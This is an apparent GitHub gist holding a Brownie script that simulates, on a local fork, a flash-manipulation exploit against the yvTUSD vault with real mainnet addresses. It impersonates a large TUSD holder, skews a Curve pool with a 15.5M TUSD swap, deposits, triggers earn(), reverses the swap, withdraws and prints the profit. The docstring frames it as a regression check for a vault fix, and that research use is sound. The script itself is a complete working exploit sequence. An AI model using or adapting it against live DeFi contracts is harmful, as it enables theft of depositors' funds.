This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
from brownie import accounts, interface, Contract, Wei
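def main():
    """Simulate a swap / deposit / earn / swap-back / withdraw sequence on a fork.

    The script measures how the TUSD balance of one account changes after it
    skews a Curve pool, deposits into the yvTUSD vault, triggers ``earn()``,
    reverses the swap and withdraws. It prints the difference as ``profit``.

    It is only meaningful against a local fork: ``accounts.at(..., force=True)``
    adds an address without its private key, so the transactions can only be
    sent through a development node that allows unlocked accounts.

    NOTE(review): the mechanism is not visible in this file. Presumably the
    vault's share accounting depends on pool state that a large swap can move
    within the same sequence; confirm against the vault and strategy source.
    If so, this script works as a regression check for a fix: after the vault
    is patched, the printed value should not be positive.
    """
    tusd = interface.ERC20('0x0000000000085d4780B73119b644AE5ecd22b376')
    yvtusd = Contract('0x37d19d1c4E1fa9DC47bD1eA12f742a0887eDa74a')
    curve = Contract('0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51')
    dai = interface.ERC20('0x6B175474E89094C44Da98b954EedeAC495271d0F')

    # exploit parameters
    swap_amt = Wei(15.5e24)  # 15.5M TUSD
    earn_amt = Wei(5.5e24)  # 5.5M TUSD

    # a user with tons of tusd (makerdao tusd join adapter)
    hacker = accounts.at('0x4454aF7C8bb9463203b66C816220D41ED7837f44', force=True)
    before = tusd.balanceOf(hacker).to('ether')

    # give approvals
    # Unlimited (2**256-1) allowances are acceptable only because this runs
    # against a throwaway fork with an impersonated account.
    tusd.approve(curve, 2**256-1, {'from': hacker})
    tusd.approve(yvtusd, 2**256-1, {'from': hacker})
    dai.approve(curve, 2**256-1, {'from': hacker})

    # run the exploit
    # Going by the amounts passed, pool index 3 is TUSD and index 0 is DAI.
    # The fourth argument is 0 in both swaps, so no minimum output is enforced.
    curve.exchange_underlying(3, 0, swap_amt, 0, {'from': hacker})
    yvtusd.deposit(earn_amt, {'from': hacker})
    # earn() is called here from the same externally supplied account as the
    # swaps, i.e. while the pool is still skewed.
    yvtusd.earn({'from': hacker})
    # Swap the entire DAI balance back, then redeem all vault shares.
    curve.exchange_underlying(0, 3, dai.balanceOf(hacker), 0, {'from': hacker})
    yvtusd.withdrawAll({'from': hacker})

    after = tusd.balanceOf(hacker).to('ether')
    print('profit', after - before)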
Author
banteg
commented
Oct 29, 2020
•
Is `interface` your own custom Solidity interface for wrapping ERC20?